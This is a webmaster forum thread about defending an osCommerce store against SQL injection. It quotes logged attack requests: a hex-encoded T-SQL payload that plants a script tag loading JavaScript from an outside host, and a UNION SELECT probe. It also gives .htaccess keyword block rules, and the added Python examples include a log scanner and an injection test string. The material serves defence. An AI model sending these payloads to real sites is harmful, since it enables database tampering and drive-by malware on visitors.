
Thread: Attack defense

  1. #1
    Junior Member
    Join Date
    Nov 2007
    Location
    USA
    Posts
    7

    Attack defense

    Hello,

    I have some suspicious activity on my web site. Something is trying to attack my site with an SQL injection technique. Here is what I have in my access_log:
    Code:
    76.108.90.33 - - [16/Oct/2008:02:50:53 -0600] "GET /product_info.php?pName=product';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 8973 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705)"
    One possible defense is to write a .htaccess rule that fails the request if the GET parameters include a "@" character. The rule that I use is:
    Code:
    RewriteCond %{QUERY_STRING} @ [NC]
    RewriteRule ^ - [F]
    The rule seems to be working fine. However, I just found that this rewrite rule creates a problem with a normal occurrence of @ at my site. I have a survey page, and the URL looks like this: http://store.com/survey.php?&email=v...&order_num=622. When I enter the link to the survey page, I get:
    Forbidden
    You don't have permission to access /survey.php on this server.
    Since an e-mail address does have an @ symbol, that rewrite rule matches and sends a Forbidden page.

    Is there any other way I can prevent attack attempts, or rewrite the rule so it won't interfere with my other pages where @ occurs normally?

    Thanks.

  2. #2
    Moderator wildjokerdesign
    Join Date
    Jun 2003
    Location
    Kansas City Mo
    Posts
    5,720


    The better solution would be to have this filtered by the PHP page that is being accessed. I would imagine that it already is, if you found it on the web some place and the developers keep the security of the program up to date.

    The other solution is to block the IP 76.108.90.33 if it happens to be consistent. You can do that via your Site Manager.

    It seems strange that you would want to send the email address via a GET/QUERY_STRING in the survey.php file. Would it not be better to send it via POST?

    You might also try:
    Code:
    RewriteCond %{QUERY_STRING} ExEC(@S) [NC]
    RewriteRule ^ - [F]
    OR:
    Code:
    RewriteCond %{QUERY_STRING} DeCLARE%20@S [NC]
    RewriteRule ^ - [F]
    Shawn
    Please remember your charity of choice: http://www.redcross.org

    Handy Links: wildjokerdesign.net | Plain Text Editors: EditPlus | Crimson

  3. #3
    Junior Member
    Join Date
    Nov 2007
    Location
    USA
    Posts
    7


    No, blocking the IP is not a solution because it keeps changing every time, as do the automatic requests the scripts send. One time it's DECLARE in the request, next time it might be something else; it's not consistent.
    Code:
    203.142.16.45 - - [05/Nov/2008:09:50:37 -0700] "GET /index.php?sort=-999+AND+1=1+UNION+ALL+SELECT+user(),database(),@@version-- HTTP/1.0" 200 46841 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
    203.142.16.45 - - [05/Nov/2008:09:50:37 -0700] "GET /index.php?sort=-1+AND+1=1+UNION+ALL+SELECT+user(),database(),@@version-- HTTP/1.0" 200 46756 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    survey.php is part of an osC contribution that I added. I didn't write the code, so I use it as is, and it's working fine.

    The rewrite rules that you mentioned above, what do they mean? Will they match only if there is either DECLARE or ExEC in the request?

    Thanks.

  4. #4
    Moderator wildjokerdesign
    Join Date
    Jun 2003
    Location
    Kansas City Mo
    Posts
    5,720


    Irin,
    Yes, the examples I posted would match Declare or exec. Actually, they would match ExEC(@S) or DeCLARE%20@S, and the match would not be case sensitive.

    I did some searching on Google and found this suggestion on the Webmaster Forums:
    Code:
    RewriteCond %{QUERY_STRING} [^a-z](declare|char|set|cast|convert|delete|drop|exec|insert|meta|script|select|truncate|update)[^a-z] [NC]
    RewriteRule (.*) - [F]
    That is a combination of all database commands that you would not want people to pass in a query. That should do what you want. You might want to browse the linked thread over at Webmaster World for other tips on using this condition.
    Shawn

  5. #5
    Junior Member
    Join Date
    Nov 2007
    Location
    USA
    Posts
    7


    If I use this rule as it is written, I can't work with the database. Functions such as update, delete, drop, insert, and maybe others too, send me to a Forbidden page. So it may be preventing people from accessing the database, but I can't access it either.
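    Worked example, added here (it is not code from this thread, from osCommerce or from the Webmaster forum): the @ rule from post #1, the keyword list from post #4 and the admin false positive from post #5, all run over a constructed access_log in Python, plus a decoder for the CAST(0x...) hex so the SQL hidden inside it becomes visible. mod_rewrite tests %{QUERY_STRING} before any percent-decoding, so the two rules from the thread are applied to the raw query string exactly as Apache would; the decoded form is used only for the hex decoding and for a narrower pattern (NARROW_RULE, my own illustration, not something from the thread). The first sample line reuses the request shape from post #1 with only the opening 40 bytes of its hex; pasted whole, that log line decodes with the same function to a T-SQL (Microsoft SQL Server) cursor over sysobjects/syscolumns that appends a script tag pointing at http://www3.800mg.cn/csrss/w.js to every text column. The second line is the UNION SELECT probe from post #3. The survey and admin URLs and the 10.0.0.x addresses are made up for illustration.

    ```python
    import re
    from urllib.parse import unquote_plus, urlsplit

    # Constructed sample of an Apache access_log. Line 1 reuses the request
    # shape from the first post, with only the opening 40 bytes of its hex
    # payload; line 2 is the UNION SELECT probe from post #3; lines 3 and 4
    # are hypothetical benign requests (survey form, store admin).
    SAMPLE_LOG = """\
    76.108.90.33 - - [16/Oct/2008:02:50:53 -0600] "GET /product_info.php?pName=product';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 8973 "-" "Mozilla/4.0"
    203.142.16.45 - - [05/Nov/2008:09:50:37 -0700] "GET /index.php?sort=-999+AND+1=1+UNION+ALL+SELECT+user(),database(),@@version-- HTTP/1.0" 200 46841 "-" "Mozilla/4.0"
    10.0.0.5 - - [05/Nov/2008:10:00:00 -0700] "GET /survey.php?email=jane@example.com&order_num=622 HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
    10.0.0.6 - - [05/Nov/2008:10:01:00 -0700] "GET /admin/categories.php?cPath=21&action=update&pID=3 HTTP/1.1" 200 5000 "-" "Mozilla/5.0"
    """

    # Common log format: client, ident, user, [timestamp], "METHOD target HTTP/x"
    REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/')

    # Rule from the first post: any "@" in the query string is forbidden.
    AT_RULE = re.compile(r"@")
    # Keyword-list rule from post #4. mod_rewrite applies it to the raw,
    # still percent-encoded query string, so that is what it is run on here.
    KEYWORD_RULE = re.compile(
        r"[^a-z](declare|char|set|cast|convert|delete|drop|exec|insert|meta|script"
        r"|select|truncate|update)[^a-z]", re.I)
    # Narrower, illustrative rule (an assumption, not from the thread): fire on
    # keyword combinations that are SQL syntax, not on lone English words.
    NARROW_RULE = re.compile(
        r"union[^a-z]+(?:all[^a-z]+)?select|declare[^a-z]+@|cast\s*\(\s*0x|exec\s*\(", re.I)
    # Hex literals of the kind the CAST(0x...) payload uses.
    HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")


    def decode_hex_literals(text):
        """Return the decoded contents of every 0x... literal found in text."""
        out = []
        for h in HEX_LITERAL.findall(text):
            if len(h) % 2:          # odd length cannot be a byte string; skip it
                continue
            out.append(bytes.fromhex(h).decode("latin-1"))
        return out


    def classify(line):
        """Apply the rules discussed in the thread to one access_log line."""
        m = REQUEST_RE.match(line)
        if not m:
            return None
        ip, target = m.group(1), m.group(2)
        parts = urlsplit(target)
        raw_query = parts.query                 # what %{QUERY_STRING} sees
        decoded = unquote_plus(raw_query)       # what the PHP script sees
        payloads = decode_hex_literals(decoded)
        return {
            "ip": ip,
            "path": parts.path,
            "at_rule": bool(AT_RULE.search(raw_query)),
            "keyword_rule": bool(KEYWORD_RULE.search(raw_query)),
            "narrow_rule": bool(NARROW_RULE.search(decoded)),
            "decoded_hex": payloads,
            # Keywords hidden inside the hex only show up after decoding;
            # the padding spaces satisfy the rule's [^a-z] guards at the ends.
            "keyword_in_hex": any(KEYWORD_RULE.search(" " + p + " ") for p in payloads),
        }


    def scan(log_text):
        return [r for r in (classify(ln) for ln in log_text.splitlines()) if r]


    if __name__ == "__main__":
        for r in scan(SAMPLE_LOG):
            hits = [k for k in ("at_rule", "keyword_rule", "narrow_rule", "keyword_in_hex") if r[k]]
            print(f"{r['ip']:15} {r['path']:28} {', '.join(hits) or 'clean'}")
            for p in r["decoded_hex"]:
                print("    decoded hex:", p)
    ```

    Running it prints one line per request: the two probes trip every rule, the survey URL trips only the @ rule (the false positive from post #1) and the admin URL trips only the keyword rule (the false positive from post #5). Note also that the keyword rule only sees the DeCLARE and SET that the attacker left outside the CAST; everything inside the hex is invisible to mod_rewrite, so a keyword list in .htaccess is bypassed by simply encoding the whole statement.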

  6. #6
    Moderator wildjokerdesign
    Join Date
    Jun 2003
    Location
    Kansas City Mo
    Posts
    5,720


    Why would you be sending those commands in a query string? I am not aware of any programs that work with the database via the web that would do that.
    Shawn

  7. #7
    Junior Member
    Join Date
    Nov 2007
    Location
    USA
    Posts
    7


    osCommerce has a store admin that allows you to view/edit customers, products, orders, etc. Functions such as update, delete, drop, insert, etc. send me to a Forbidden page with the new RewriteRule.

    Unfortunately, I'm not familiar with the scripts that hackers use to attack web sites. I'm just seeing hits from different IPs with query strings in the requests.

  8. #8
    Moderator wildjokerdesign
    Join Date
    Jun 2003
    Location
    Kansas City Mo
    Posts
    5,720


    You could remove those from the RewriteCond if you wanted to. I don't really think you need to worry about blocking these requests. osCommerce should be doing that for you when needed.
    Shawn

  9. #9
    Junior Member
    Join Date
    Nov 2007
    Location
    USA
    Posts
    7


    I don't know if osCommerce blocks these attempts or not and have no way to check it. I just hope that it does. However, I still see from time to time that different scripts are trying to access my database. I don't know if it's something that I need to worry about or not.

  10. #10
    Junior Member
    Join Date
    Nov 2008
    Posts
    2


    If product_info.php is your page, you can (and should) truncate the product name at the apostrophe before taking any action on the user input.
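    Added example (mine, not osCommerce code): the three ways of handling pName that come up in this thread, side by side, on a throwaway SQLite table standing in for the store's products table (the column names products_id, products_name and products_price are assumptions; the real schema and the MySQL driver are not used). lookup_concat is the vulnerable splice that the probes in the access_log are hunting for; lookup_truncated applies post #10's cut-at-the-apostrophe; lookup_param is the parameterised query the PHP side would use (mysqli or PDO prepared statements), which keeps an apostrophe in a legitimate product name intact. The product rows are constructed.

    ```python
    import sqlite3


    def make_db():
        """Constructed in-memory stand-in for the store's products table."""
        con = sqlite3.connect(":memory:")
        con.execute("CREATE TABLE products (products_id INTEGER PRIMARY KEY,"
                    " products_name TEXT NOT NULL, products_price REAL NOT NULL)")
        con.executemany(
            "INSERT INTO products (products_name, products_price) VALUES (?, ?)",
            [("Widget", 9.99), ("Gadget", 19.99), ("O'Reilly Guide", 29.99)])
        return con


    def lookup_concat(con, pname):
        """Vulnerable: the user-supplied name is spliced into the SQL text.
        This is the pattern the probes in the access_log are fishing for."""
        sql = ("SELECT products_id, products_name FROM products"
               " WHERE products_name = '" + pname + "'")
        return con.execute(sql).fetchall()


    def truncate_at_apostrophe(pname):
        """Post #10's mitigation: drop everything from the first apostrophe on."""
        return pname.split("'", 1)[0]


    def lookup_truncated(con, pname):
        """Concatenation, but with the input truncated first."""
        return lookup_concat(con, truncate_at_apostrophe(pname))


    def lookup_param(con, pname):
        """Parameterised: the driver passes the value separately from the SQL,
        so an apostrophe in the name is data, never syntax."""
        sql = "SELECT products_id, products_name FROM products WHERE products_name = ?"
        return con.execute(sql, (pname,)).fetchall()


    if __name__ == "__main__":
        con = make_db()
        for name in ("Widget", "x' OR '1'='1", "O'Reilly Guide"):
            print(repr(name))
            try:
                print("  concat   :", lookup_concat(con, name))
            except sqlite3.OperationalError as e:
                print("  concat   : SQL error:", e)
            print("  truncated:", lookup_truncated(con, name))
            print("  param    :", lookup_param(con, name))
    ```

    With `x' OR '1'='1` the concatenated query returns every product, the truncated one returns nothing, and the parameterised one returns nothing. With the legitimate name `O'Reilly Guide` the concatenated query is a SQL syntax error, the truncated one looks up `O` and finds nothing, and only the parameterised query finds the row.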
